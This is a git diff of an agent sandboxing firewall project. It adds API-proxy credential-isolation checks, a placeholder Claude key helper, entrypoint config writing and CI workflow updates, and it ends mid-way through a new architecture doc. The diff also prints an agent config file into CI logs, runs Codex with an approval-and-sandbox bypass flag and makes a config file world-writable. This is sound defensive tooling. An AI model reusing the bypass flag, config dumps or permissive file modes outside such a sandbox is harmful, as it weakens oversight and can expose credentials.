GH_AW_ALLOWED_DOMAINS: "*.githubusercontent.com,anthropic.com,api.anthropic.com,api.github.com,api.snapcraft.io,archive.ubuntu.com,azure.archive.ubuntu.com,cdn.playwright.dev,codeload.github.com,crl.geotrust.com,crl.globalsign.com,crl.identrust.com,crl.sectigo.com,crl.thawte.com,crl.usertrust.com,crl.verisign.com,crl3.digicert.com,crl4.digicert.com,crls.ssl.com,files.pythonhosted.org,ghcr.io,github-cloud.githubusercontent.com,github-cloud.s3.amazonaws.com,github.com,github.githubassets.com,host.docker.internal,json-schema.org,json.schemastore.org,keyserver.ubuntu.com,lfs.github.com,objects.githubusercontent.com,ocsp.digicert.com,ocsp.geotrust.com,ocsp.globalsign.com,ocsp.identrust.com,ocsp.sectigo.com,ocsp.ssl.com,ocsp.thawte.com,ocsp.usertrust.com,ocsp.verisign.com,packagecloud.io,packages.cloud.google.com,packages.microsoft.com,playwright.download.prss.microsoft.com,ppa.launchpad.net,pypi.org,raw.githubusercontent.com,registry.npmjs.org,s.symcb.com,s.symcd.com,security.ubuntu.com,sentry.io,statsig.anthropic.com,ts-crl.ws.symantec.com,ts-ocsp.ws.symantec.com"
@@ -858,7 +886,7 @@ jobs:
if-no-files-found: warn
- name: Parse agent logs for step summary
if: always()
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_AW_AGENT_OUTPUT: /tmp/gh-aw/agent-stdio.log
with:
@@ -869,7 +897,7 @@ jobs:
await main();
- name: Parse MCP gateway logs for step summary
if: always()
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
with:
script: |
const { setupGlobals } = require('/opt/gh-aw/actions/setup_globals.cjs');
@@ -892,6 +920,9 @@ jobs:
with:
name: cache-memory
path: /tmp/gh-aw/cache-memory
+ - if: always()
+ name: Show final Claude Code config
+ run: "echo \"=== Final Claude Code Config ===\"\nif [ -f ~/.claude.json ]; then\n echo \"File: ~/.claude.json\"\n cat ~/.claude.json\nelse\n echo \"~/.claude.json not found\"\nfi\nif [ -f ~/.claude/config.json ]; then\n echo \"\"\n echo \"File: ~/.claude/config.json (legacy)\"\n cat ~/.claude/config.json\nelse\n echo \"~/.claude/config.json not found\"\nfi\n"
- name: Validate safe outputs were invoked
run: "OUTPUTS_FILE=\"${GH_AW_SAFE_OUTPUTS:-/opt/gh-aw/safeoutputs/outputs.jsonl}\"\nif [ ! -s \"$OUTPUTS_FILE\" ]; then\n echo \"::error::No safe outputs were invoked. Smoke tests require the agent to call safe output tools.\"\n exit 1\nfi\necho \"Safe output entries found: $(wc -l < \"$OUTPUTS_FILE\")\"\nif [ \"$GITHUB_EVENT_NAME\" = \"pull_request\" ]; then\n if ! grep -q '\"add_comment\"' \"$OUTPUTS_FILE\"; then\n echo \"::error::Agent did not call add_comment on a pull_request trigger.\"\n exit 1\n fi\n echo \"add_comment verified for PR trigger\"\nfi\necho \"Safe output validation passed\""
@@ -906,6 +937,7 @@ jobs:
/tmp/gh-aw/aw_info.json
/tmp/gh-aw/mcp-logs/
/tmp/gh-aw/sandbox/firewall/logs/
+ /tmp/gh-aw/sandbox/firewall/api-proxy-logs/
/tmp/gh-aw/agent-stdio.log
/tmp/gh-aw/agent/
if-no-files-found: ignore
@@ -930,20 +962,9 @@ jobs:
total_count: ${{ steps.missing_tool.outputs.total_count }}
steps:
- name: Setup Scripts
- uses: github/gh-aw/actions/setup@7a970851c1090295e55a16e549c61ba1ce227f16 # v0.42.17
+ uses: github/gh-aw/actions/setup@v0.43.23
with:
destination: /opt/gh-aw/actions
- - name: Debug job inputs
- env:
- COMMENT_ID: ${{ needs.activation.outputs.comment_id }}
- COMMENT_REPO: ${{ needs.activation.outputs.comment_repo }}
- AGENT_OUTPUT_TYPES: ${{ needs.agent.outputs.output_types }}
- AGENT_CONCLUSION: ${{ needs.agent.result }}
- run: |
- echo "Comment ID: $COMMENT_ID"
- echo "Comment Repo: $COMMENT_REPO"
- echo "Agent Output Types: $AGENT_OUTPUT_TYPES"
- echo "Agent Conclusion: $AGENT_CONCLUSION"
- name: Download agent output artifact
continue-on-error: true
uses: actions/download-artifact@018cc2cf5baa6db3ef3c5f8a56943fffe632ef53 # v6.0.0
@@ -957,7 +978,7 @@ jobs:
echo "GH_AW_AGENT_OUTPUT=/tmp/gh-aw/safeoutputs/agent_output.json" >> "$GITHUB_ENV"
- name: Process No-Op Messages
id: noop
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_AW_AGENT_OUTPUT: ${{ env.GH_AW_AGENT_OUTPUT }}
GH_AW_NOOP_MAX: 1
@@ -971,7 +992,7 @@ jobs:
await main();
- name: Record Missing Tool
id: missing_tool
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_AW_AGENT_OUTPUT: ${{ env.GH_AW_AGENT_OUTPUT }}
GH_AW_WORKFLOW_NAME: "Smoke Claude"
@@ -984,12 +1005,13 @@ jobs:
await main();
- name: Handle Agent Failure
id: handle_agent_failure
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_AW_AGENT_OUTPUT: ${{ env.GH_AW_AGENT_OUTPUT }}
GH_AW_WORKFLOW_NAME: "Smoke Claude"
GH_AW_RUN_URL: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}
GH_AW_AGENT_CONCLUSION: ${{ needs.agent.result }}
+ GH_AW_WORKFLOW_ID: "smoke-claude"
GH_AW_SECRET_VERIFICATION_RESULT: ${{ needs.agent.outputs.secret_verification_result }}
GH_AW_CHECKOUT_PR_SUCCESS: ${{ needs.agent.outputs.checkout_pr_success }}
GH_AW_SAFE_OUTPUT_MESSAGES: "{\"footer\":\"\\u003e π₯ *[THE END] β Illustrated by [{workflow_name}]({run_url})*\",\"runStarted\":\"π₯ **WHOOSH!** [{workflow_name}]({run_url}) springs into action on this {event_type}! *[Panel 1 begins...]*\",\"runSuccess\":\"π¬ **THE END** β [{workflow_name}]({run_url}) **MISSION: ACCOMPLISHED!** The hero saves the day! β¨\",\"runFailure\":\"π« **TO BE CONTINUED...** [{workflow_name}]({run_url}) {status}! Our hero faces unexpected challenges...\"}"
@@ -1002,7 +1024,7 @@ jobs:
await main();
- name: Handle No-Op Message
id: handle_noop_message
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_AW_AGENT_OUTPUT: ${{ env.GH_AW_AGENT_OUTPUT }}
GH_AW_WORKFLOW_NAME: "Smoke Claude"
@@ -1019,7 +1041,7 @@ jobs:
await main();
- name: Update reaction comment with completion status
id: conclusion
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_AW_AGENT_OUTPUT: ${{ env.GH_AW_AGENT_OUTPUT }}
GH_AW_COMMENT_ID: ${{ needs.activation.outputs.comment_id }}
@@ -1047,7 +1069,7 @@ jobs:
success: ${{ steps.parse_results.outputs.success }}
steps:
- name: Setup Scripts
- uses: github/gh-aw/actions/setup@7a970851c1090295e55a16e549c61ba1ce227f16 # v0.42.17
+ uses: github/gh-aw/actions/setup@v0.43.23
with:
destination: /opt/gh-aw/actions
- name: Download agent artifacts
@@ -1068,7 +1090,7 @@ jobs:
run: |
echo "Agent output-types: $AGENT_OUTPUT_TYPES"
- name: Setup threat detection
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
WORKFLOW_NAME: "Smoke Claude"
WORKFLOW_DESCRIPTION: "Smoke test workflow that validates Claude engine functionality by reviewing recent PRs twice daily"
@@ -1090,12 +1112,12 @@ jobs:
CLAUDE_CODE_OAUTH_TOKEN: ${{ secrets.CLAUDE_CODE_OAUTH_TOKEN }}
ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
- name: Setup Node.js
- uses: actions/setup-node@395ad3262231945c25e8478fd5baf05154b1d79f # v6.1.0
+ uses: actions/setup-node@6044e13b5dc448c55e2357c09f80417699197238 # v6.2.0
with:
node-version: '24'
package-manager-cache: false
- name: Install Claude Code CLI
- run: npm install -g --silent @anthropic-ai/claude-code@2.1.34
+ run: npm install -g --silent @anthropic-ai/claude-code@2.1.39
- name: Execute Claude Code CLI
id: agentic_execution
# Allowed tools (sorted):
@@ -1137,7 +1159,7 @@ jobs:
MCP_TOOL_TIMEOUT: 60000
- name: Parse threat detection results
id: parse_results
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
with:
script: |
const { setupGlobals } = require('/opt/gh-aw/actions/setup_globals.cjs');
@@ -1176,7 +1198,7 @@ jobs:
process_safe_outputs_temporary_id_map: ${{ steps.process_safe_outputs.outputs.temporary_id_map }}
steps:
- name: Setup Scripts
- uses: github/gh-aw/actions/setup@7a970851c1090295e55a16e549c61ba1ce227f16 # v0.42.17
+ uses: github/gh-aw/actions/setup@v0.43.23
with:
destination: /opt/gh-aw/actions
- name: Download agent output artifact
@@ -1192,7 +1214,7 @@ jobs:
echo "GH_AW_AGENT_OUTPUT=/tmp/gh-aw/safeoutputs/agent_output.json" >> "$GITHUB_ENV"
- name: Process Safe Outputs
id: process_safe_outputs
- uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
env:
GH_AW_AGENT_OUTPUT: ${{ env.GH_AW_AGENT_OUTPUT }}
GH_AW_SAFE_OUTPUTS_HANDLER_CONFIG: "{\"add_comment\":{\"hide_older_comments\":true,\"max\":1},\"add_labels\":{\"allowed\":[\"smoke-claude\"]},\"missing_data\":{},\"missing_tool\":{}}"
@@ -1213,7 +1235,7 @@ jobs:
permissions: {}
steps:
- name: Setup Scripts
- uses: github/gh-aw/actions/setup@7a970851c1090295e55a16e549c61ba1ce227f16 # v0.42.17
+ uses: github/gh-aw/actions/setup@v0.43.23
with:
destination: /opt/gh-aw/actions
- name: Download cache-memory artifact (default)
@@ -1225,6 +1247,6 @@ jobs:
- name: Save cache-memory to cache (default)
uses: actions/cache/save@0057852bfaa89a56745cba8c7296529d2fc39830 # v4.3.0
with:
- key: memory-${{ github.workflow }}-${{ github.run_id }}
+ key: memory-${{ env.GH_AW_WORKFLOW_ID_SANITIZED }}-${{ github.run_id }}
path: /tmp/gh-aw/cache-memory
diff --git a/.github/workflows/smoke-claude.md b/.github/workflows/smoke-claude.md
index 2320fc40..b5388c98 100644
--- a/.github/workflows/smoke-claude.md
+++ b/.github/workflows/smoke-claude.md
@@ -49,6 +49,23 @@ safe-outputs:
run-failure: "π« **TO BE CONTINUED...** [{workflow_name}]({run_url}) {status}! Our hero faces unexpected challenges..."
timeout-minutes: 10
post-steps:
+ - name: Show final Claude Code config
+ if: always()
+ run: |
+ echo "=== Final Claude Code Config ==="
+ if [ -f ~/.claude.json ]; then
+ echo "File: ~/.claude.json"
+ cat ~/.claude.json
+ else
+ echo "~/.claude.json not found"
+ fi
+ if [ -f ~/.claude/config.json ]; then
+ echo ""
+ echo "File: ~/.claude/config.json (legacy)"
+ cat ~/.claude/config.json
+ else
+ echo "~/.claude/config.json not found"
+ fi
- name: Validate safe outputs were invoked
run: |
OUTPUTS_FILE="${GH_AW_SAFE_OUTPUTS:-/opt/gh-aw/safeoutputs/outputs.jsonl}"
diff --git a/.github/workflows/smoke-codex.lock.yml b/.github/workflows/smoke-codex.lock.yml
index ce77a62e..baea8deb 100644
--- a/.github/workflows/smoke-codex.lock.yml
+++ b/.github/workflows/smoke-codex.lock.yml
@@ -1381,7 +1381,7 @@ jobs:
run: |
set -o pipefail
mkdir -p "$CODEX_HOME/logs"
- sudo -E awf --env-all --container-workdir "${GITHUB_WORKSPACE}" --allow-domains '*.githubusercontent.com,172.30.0.1,api.openai.com,api.snapcraft.io,archive.ubuntu.com,azure.archive.ubuntu.com,cdn.playwright.dev,codeload.github.com,crl.geotrust.com,crl.globalsign.com,crl.identrust.com,crl.sectigo.com,crl.thawte.com,crl.usertrust.com,crl.verisign.com,crl3.digicert.com,crl4.digicert.com,crls.ssl.com,github-cloud.githubusercontent.com,github-cloud.s3.amazonaws.com,github.githubassets.com,host.docker.internal,json-schema.org,json.schemastore.org,keyserver.ubuntu.com,lfs.github.com,mcp.tavily.com,objects.githubusercontent.com,ocsp.digicert.com,ocsp.geotrust.com,ocsp.globalsign.com,ocsp.identrust.com,ocsp.sectigo.com,ocsp.ssl.com,ocsp.thawte.com,ocsp.usertrust.com,ocsp.verisign.com,openai.com,packagecloud.io,packages.cloud.google.com,packages.microsoft.com,playwright.download.prss.microsoft.com,ppa.launchpad.net,raw.githubusercontent.com,s.symcb.com,s.symcd.com,security.ubuntu.com,ts-crl.ws.symantec.com,ts-ocsp.ws.symantec.com' --log-level info --proxy-logs-dir /tmp/gh-aw/sandbox/firewall/logs --enable-host-access --build-local \
+ sudo -E awf --env-all --container-workdir "${GITHUB_WORKSPACE}" --allow-domains '*.githubusercontent.com,172.30.0.1,api.openai.com,api.snapcraft.io,archive.ubuntu.com,azure.archive.ubuntu.com,cdn.playwright.dev,codeload.github.com,crl.geotrust.com,crl.globalsign.com,crl.identrust.com,crl.sectigo.com,crl.thawte.com,crl.usertrust.com,crl.verisign.com,crl3.digicert.com,crl4.digicert.com,crls.ssl.com,github-cloud.githubusercontent.com,github-cloud.s3.amazonaws.com,github.githubassets.com,host.docker.internal,json-schema.org,json.schemastore.org,keyserver.ubuntu.com,lfs.github.com,mcp.tavily.com,objects.githubusercontent.com,ocsp.digicert.com,ocsp.geotrust.com,ocsp.globalsign.com,ocsp.identrust.com,ocsp.sectigo.com,ocsp.ssl.com,ocsp.thawte.com,ocsp.usertrust.com,ocsp.verisign.com,openai.com,packagecloud.io,packages.cloud.google.com,packages.microsoft.com,playwright.download.prss.microsoft.com,ppa.launchpad.net,raw.githubusercontent.com,s.symcb.com,s.symcd.com,security.ubuntu.com,ts-crl.ws.symantec.com,ts-ocsp.ws.symantec.com' --log-level info --proxy-logs-dir /tmp/gh-aw/sandbox/firewall/logs --enable-host-access --enable-api-proxy --build-local \
-- /bin/bash -c 'export PATH="$(find /opt/hostedtoolcache -maxdepth 4 -type d -name bin 2>/dev/null | tr '\''\n'\'' '\'':'\'')$PATH"; [ -n "$GOROOT" ] && export PATH="$GOROOT/bin:$PATH" || true && INSTRUCTION="$(cat /tmp/gh-aw/aw-prompts/prompt.txt)" && codex ${GH_AW_MODEL_AGENT_CODEX:+-c model="$GH_AW_MODEL_AGENT_CODEX" }exec --dangerously-bypass-approvals-and-sandbox --skip-git-repo-check "$INSTRUCTION"' \
2>&1 | tee /tmp/gh-aw/agent-stdio.log
env:
diff --git a/README.md b/README.md
index f57448ef..1a80caf2 100644
--- a/README.md
+++ b/README.md
@@ -35,6 +35,7 @@ The `--` separator divides firewall options from the command to run.
- [Usage guide](docs/usage.md) β CLI flags, domain allowlists, examples
- [Chroot mode](docs/chroot-mode.md) β use host binaries with network isolation
- [API proxy sidecar](docs/api-proxy-sidecar.md) β secure credential management for LLM APIs
+- [Authentication architecture](docs/authentication-architecture.md) β deep dive into token handling and credential isolation
- [SSL Bump](docs/ssl-bump.md) β HTTPS content inspection for URL path filtering
- [GitHub Actions](docs/github_actions.md) β CI/CD integration and MCP server setup
- [Environment variables](docs/environment.md) β passing environment variables to containers
diff --git a/containers/agent/Dockerfile b/containers/agent/Dockerfile
index 717c56cf..305a4f78 100644
--- a/containers/agent/Dockerfile
+++ b/containers/agent/Dockerfile
@@ -62,11 +62,13 @@ RUN if ! getent group awfuser >/dev/null 2>&1; then \
mkdir -p /home/awfuser/.copilot/logs && \
chown -R awfuser:awfuser /home/awfuser
-# Copy iptables setup script and PID logger
+# Copy iptables setup script, PID logger, API proxy health check, and Claude key helper
COPY setup-iptables.sh /usr/local/bin/setup-iptables.sh
COPY entrypoint.sh /usr/local/bin/entrypoint.sh
COPY pid-logger.sh /usr/local/bin/pid-logger.sh
-RUN chmod +x /usr/local/bin/setup-iptables.sh /usr/local/bin/entrypoint.sh /usr/local/bin/pid-logger.sh
+COPY api-proxy-health-check.sh /usr/local/bin/api-proxy-health-check.sh
+COPY get-claude-key.sh /usr/local/bin/get-claude-key.sh
+RUN chmod +x /usr/local/bin/setup-iptables.sh /usr/local/bin/entrypoint.sh /usr/local/bin/pid-logger.sh /usr/local/bin/api-proxy-health-check.sh /usr/local/bin/get-claude-key.sh
# Copy pre-built one-shot-token library from rust-builder stage
# This prevents tokens from being read multiple times (e.g., by malicious code)
diff --git a/containers/agent/api-proxy-health-check.sh b/containers/agent/api-proxy-health-check.sh
new file mode 100755
index 00000000..30cc2223
--- /dev/null
+++ b/containers/agent/api-proxy-health-check.sh
@@ -0,0 +1,108 @@
+#!/bin/bash
+# api-proxy-health-check.sh
+# Pre-flight health check to verify API proxy credential isolation
+# This script ensures:
+# 1. API keys are NOT present in agent environment (credential isolation working)
+# 2. API proxy is reachable and healthy (connectivity established)
+#
+# Usage: source this script before running agent commands
+# Returns: 0 if checks pass, 1 if checks fail (prevents agent from running)
+
+set -e
+
+echo "[health-check] API Proxy Pre-flight Check"
+echo "[health-check] =========================================="
+
+# Track if any API proxy is configured
+API_PROXY_CONFIGURED=false
+
+# Check Claude/Anthropic configuration
+if [ -n "$ANTHROPIC_BASE_URL" ]; then
+ API_PROXY_CONFIGURED=true
+ echo "[health-check] Checking Anthropic API proxy configuration..."
+
+ # Verify credentials are NOT in agent environment
+ if [ -n "$ANTHROPIC_API_KEY" ] || [ -n "$CLAUDE_API_KEY" ]; then
+ echo "[health-check][ERROR] Anthropic API key found in agent environment!"
+ echo "[health-check][ERROR] Credential isolation failed - keys should only be in api-proxy container"
+ echo "[health-check][ERROR] ANTHROPIC_API_KEY=${ANTHROPIC_API_KEY:+}"
+ echo "[health-check][ERROR] CLAUDE_API_KEY=${CLAUDE_API_KEY:+}"
+ exit 1
+ fi
+ echo "[health-check] β Anthropic credentials NOT in agent environment (correct)"
+
+ # Verify ANTHROPIC_AUTH_TOKEN is placeholder (if present)
+ if [ -n "$ANTHROPIC_AUTH_TOKEN" ]; then
+ if [ "$ANTHROPIC_AUTH_TOKEN" != "placeholder-token-for-credential-isolation" ]; then
+ echo "[health-check][ERROR] ANTHROPIC_AUTH_TOKEN contains non-placeholder value!"
+ echo "[health-check][ERROR] Token should be 'placeholder-token-for-credential-isolation'"
+ exit 1
+ fi
+ echo "[health-check] β ANTHROPIC_AUTH_TOKEN is placeholder value (correct)"
+ fi
+
+ # Perform health check using BASE_URL
+ echo "[health-check] Testing connectivity to Anthropic API proxy at $ANTHROPIC_BASE_URL..."
+
+ # Extract host and port from BASE_URL (format: http://IP:PORT)
+ PROXY_HOST=$(echo "$ANTHROPIC_BASE_URL" | sed -E 's|^https?://([^:]+):.*|\1|')
+ PROXY_PORT=$(echo "$ANTHROPIC_BASE_URL" | sed -E 's|^https?://[^:]+:([0-9]+).*|\1|')
+
+ # Test TCP connectivity with timeout
+ if timeout 5 bash -c "cat < /dev/null > /dev/tcp/$PROXY_HOST/$PROXY_PORT" 2>/dev/null; then
+ echo "[health-check] β Anthropic API proxy is reachable at $ANTHROPIC_BASE_URL"
+ else
+ echo "[health-check][ERROR] Cannot connect to Anthropic API proxy at $ANTHROPIC_BASE_URL"
+ echo "[health-check][ERROR] Proxy may not be running or network is blocked"
+ exit 1
+ fi
+fi
+
+# Check OpenAI/Codex configuration
+if [ -n "$OPENAI_BASE_URL" ]; then
+ API_PROXY_CONFIGURED=true
+ echo "[health-check] Checking OpenAI API proxy configuration..."
+
+ # Verify credentials are NOT in agent environment
+ # Note: CODEX_API_KEY check is temporarily disabled - Codex receives credentials directly
+ if [ -n "$OPENAI_API_KEY" ] || [ -n "$OPENAI_KEY" ]; then
+ echo "[health-check][ERROR] OpenAI API key found in agent environment!"
+ echo "[health-check][ERROR] Credential isolation failed - keys should only be in api-proxy container"
+ echo "[health-check][ERROR] OPENAI_API_KEY=${OPENAI_API_KEY:+}"
+ # echo "[health-check][ERROR] CODEX_API_KEY=${CODEX_API_KEY:+}" # Temporarily disabled - Codex uses direct credentials
+ echo "[health-check][ERROR] OPENAI_KEY=${OPENAI_KEY:+}"
+ exit 1
+ fi
+ echo "[health-check] β OpenAI credentials NOT in agent environment (correct)"
+ # Note: CODEX_API_KEY is intentionally passed through for Codex agent compatibility
+
+ # Perform health check using BASE_URL
+ echo "[health-check] Testing connectivity to OpenAI API proxy at $OPENAI_BASE_URL..."
+
+ # Extract host and port from BASE_URL (format: http://IP:PORT)
+ PROXY_HOST=$(echo "$OPENAI_BASE_URL" | sed -E 's|^https?://([^:]+):.*|\1|')
+ PROXY_PORT=$(echo "$OPENAI_BASE_URL" | sed -E 's|^https?://[^:]+:([0-9]+).*|\1|')
+
+ # Test TCP connectivity with timeout
+ if timeout 5 bash -c "cat < /dev/null > /dev/tcp/$PROXY_HOST/$PROXY_PORT" 2>/dev/null; then
+ echo "[health-check] β OpenAI API proxy is reachable at $OPENAI_BASE_URL"
+ else
+ echo "[health-check][ERROR] Cannot connect to OpenAI API proxy at $OPENAI_BASE_URL"
+ echo "[health-check][ERROR] Proxy may not be running or network is blocked"
+ exit 1
+ fi
+fi
+
+# Summary
+if [ "$API_PROXY_CONFIGURED" = "true" ]; then
+ echo "[health-check] =========================================="
+ echo "[health-check] β All API proxy health checks passed"
+ echo "[health-check] β Credential isolation verified"
+ echo "[health-check] β Connectivity established"
+ echo "[health-check] =========================================="
+else
+ echo "[health-check] No API proxy configured (ANTHROPIC_BASE_URL and OPENAI_BASE_URL not set)"
+ echo "[health-check] Skipping health checks"
+fi
+
+exit 0
diff --git a/containers/agent/entrypoint.sh b/containers/agent/entrypoint.sh
index 52c4335f..eab7a845 100644
--- a/containers/agent/entrypoint.sh
+++ b/containers/agent/entrypoint.sh
@@ -114,6 +114,54 @@ fi
# Setup iptables rules
/usr/local/bin/setup-iptables.sh
+# Run API proxy health checks (verifies credential isolation and connectivity)
+# This must run AFTER iptables setup (which allows api-proxy traffic) but BEFORE user command
+# If health check fails, the script exits with non-zero code and prevents agent from running
+/usr/local/bin/api-proxy-health-check.sh || exit 1
+
+# Configure Claude Code API key helper
+# This ensures the apiKeyHelper is properly configured in the config file
+# The config file must exist before Claude Code starts for authentication to work
+# In chroot mode, we write to /host$HOME/.claude.json so it's accessible after chroot
+if [ -n "$CLAUDE_CODE_API_KEY_HELPER" ]; then
+ echo "[entrypoint] Claude Code API key helper configured: $CLAUDE_CODE_API_KEY_HELPER"
+
+ # In chroot mode, write to /host path so file is accessible after chroot transition
+ if [ "${AWF_CHROOT_ENABLED}" = "true" ]; then
+ CONFIG_FILE="/host$HOME/.claude.json"
+ else
+ CONFIG_FILE="$HOME/.claude.json"
+ fi
+
+ if [ -f "$CONFIG_FILE" ]; then
+ # File exists - check if it has apiKeyHelper
+ if grep -q '"apiKeyHelper"' "$CONFIG_FILE"; then
+ # apiKeyHelper exists - validate it matches the environment variable
+ echo "[entrypoint] Claude Code config file exists with apiKeyHelper, validating..."
+ CONFIGURED_HELPER=$(grep -o '"apiKeyHelper":"[^"]*"' "$CONFIG_FILE" | cut -d'"' -f4)
+ if [ "$CONFIGURED_HELPER" != "$CLAUDE_CODE_API_KEY_HELPER" ]; then
+ echo "[entrypoint][ERROR] apiKeyHelper mismatch:"
+ echo "[entrypoint][ERROR] Environment variable: $CLAUDE_CODE_API_KEY_HELPER"
+ echo "[entrypoint][ERROR] Config file value: $CONFIGURED_HELPER"
+ exit 1
+ fi
+ echo "[entrypoint] β Claude Code API key helper validated: $CLAUDE_CODE_API_KEY_HELPER"
+ else
+ # File exists but no apiKeyHelper - write it (overwrites empty {} created by docker-manager)
+ echo "[entrypoint] Claude Code config file exists but missing apiKeyHelper, writing..."
+ echo "{\"apiKeyHelper\":\"$CLAUDE_CODE_API_KEY_HELPER\"}" > "$CONFIG_FILE"
+ chmod 666 "$CONFIG_FILE"
+ echo "[entrypoint] β Wrote apiKeyHelper to $CONFIG_FILE"
+ fi
+ else
+ # File doesn't exist - create it
+ echo "[entrypoint] Creating Claude Code config file with apiKeyHelper..."
+ echo "{\"apiKeyHelper\":\"$CLAUDE_CODE_API_KEY_HELPER\"}" > "$CONFIG_FILE"
+ chmod 666 "$CONFIG_FILE"
+ echo "[entrypoint] β Created $CONFIG_FILE with apiKeyHelper: $CLAUDE_CODE_API_KEY_HELPER"
+ fi
+fi
+
# Print proxy environment
echo "[entrypoint] Proxy configuration:"
echo "[entrypoint] HTTP_PROXY=$HTTP_PROXY"
diff --git a/containers/agent/get-claude-key.sh b/containers/agent/get-claude-key.sh
new file mode 100755
index 00000000..c459f6e5
--- /dev/null
+++ b/containers/agent/get-claude-key.sh
@@ -0,0 +1,20 @@
+#!/bin/bash
+# API Key Helper for Claude Code
+# This script outputs a placeholder API key since the real key is held
+# exclusively in the api-proxy sidecar container for credential isolation.
+#
+# The api-proxy intercepts requests and injects the real ANTHROPIC_API_KEY,
+# so this placeholder key will never reach the actual Anthropic API.
+#
+# This approach ensures:
+# 1. Claude Code agent never has access to the real API key
+# 2. Only api-proxy container holds the real credentials
+# 3. Health checks verify keys are NOT in agent environment
+
+# Log helper invocation to stderr (stdout is reserved for the API key)
+echo "[get-claude-key.sh] API key helper invoked at $(date -Iseconds)" >&2
+echo "[get-claude-key.sh] Returning placeholder key for credential isolation" >&2
+echo "[get-claude-key.sh] Real authentication via ANTHROPIC_BASE_URL=${ANTHROPIC_BASE_URL:-not set}" >&2
+
+# Output a placeholder key (will be replaced by api-proxy)
+echo "sk-ant-placeholder-key-for-credential-isolation"
diff --git a/containers/api-proxy/Dockerfile b/containers/api-proxy/Dockerfile
index 7f8459f6..3e8d8d85 100644
--- a/containers/api-proxy/Dockerfile
+++ b/containers/api-proxy/Dockerfile
@@ -28,5 +28,6 @@ USER apiproxy
# 10001 - Anthropic API proxy
EXPOSE 10000 10001
-# Start the proxy server
-CMD ["node", "server.js"]
+# Redirect stdout/stderr to log file for persistence
+# Use shell form to enable redirection and tee for both file and console
+CMD node server.js 2>&1 | tee -a /var/log/api-proxy/api-proxy.log
diff --git a/containers/api-proxy/server.js b/containers/api-proxy/server.js
index bf5dbb52..8f381224 100644
--- a/containers/api-proxy/server.js
+++ b/containers/api-proxy/server.js
@@ -175,6 +175,7 @@ if (OPENAI_API_KEY) {
}
console.log(`[OpenAI Proxy] ${sanitizeForLog(req.method)} ${sanitizeForLog(req.url)}`);
+ console.log(`[OpenAI Proxy] Injecting Authorization header with OPENAI_API_KEY`);
proxyRequest(req, res, 'api.openai.com', {
'Authorization': `Bearer ${OPENAI_API_KEY}`,
});
@@ -216,6 +217,7 @@ if (ANTHROPIC_API_KEY) {
}
console.log(`[Anthropic Proxy] ${sanitizeForLog(req.method)} ${sanitizeForLog(req.url)}`);
+ console.log(`[Anthropic Proxy] Injecting x-api-key header with ANTHROPIC_API_KEY`);
// Only set anthropic-version as default; preserve agent-provided version
const anthropicHeaders = { 'x-api-key': ANTHROPIC_API_KEY };
if (!req.headers['anthropic-version']) {
diff --git a/docs/api-proxy-sidecar.md b/docs/api-proxy-sidecar.md
index 0c1058b8..832897a5 100644
--- a/docs/api-proxy-sidecar.md
+++ b/docs/api-proxy-sidecar.md
@@ -2,6 +2,9 @@
The AWF firewall supports an optional Node.js-based API proxy sidecar that securely holds LLM API credentials and automatically injects authentication headers while routing all traffic through Squid to respect domain whitelisting.
+> [!NOTE]
+> For a comprehensive deep dive into how AWF handles authentication tokens and credential isolation, see the [Authentication Architecture](authentication-architecture.md) guide.
+
## Overview
When enabled, the API proxy sidecar:
diff --git a/docs/authentication-architecture.md b/docs/authentication-architecture.md
new file mode 100644
index 00000000..a195de6e
--- /dev/null
+++ b/docs/authentication-architecture.md
@@ -0,0 +1,593 @@
+# Authentication Architecture: How AWF Handles LLM API Tokens
+
+## Overview
+
+The Agentic Workflow Firewall (AWF) implements a multi-layered security architecture to protect LLM API authentication tokens while providing transparent proxying for AI agent calls. This document explains the complete authentication flow, token isolation mechanisms, and network routing for both **OpenAI/Codex** and **Anthropic/Claude** APIs.
+
+> [!IMPORTANT]
+> **Both OpenAI/Codex and Anthropic/Claude use identical credential isolation architecture.** API keys are held exclusively in the api-proxy sidecar container (never in the agent container), and both providers route through the same Squid proxy for domain filtering. The only differences are the port numbers (10000 for OpenAI, 10001 for Anthropic) and authentication header formats (`Authorization: Bearer` vs `x-api-key`).
+
+## Architecture Components
+
+AWF uses a **3-container architecture** when API proxy mode is enabled:
+
+1. **Squid Proxy Container** (`172.30.0.10`) - L7 HTTP/HTTPS domain filtering
+2. **API Proxy Sidecar Container** (`172.30.0.30`) - Credential injection and isolation
+3. **Agent Execution Container** (`172.30.0.20`) - User command execution environment
+
+```
+βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
+β HOST MACHINE β
+β β
+β AWF CLI reads environment: β
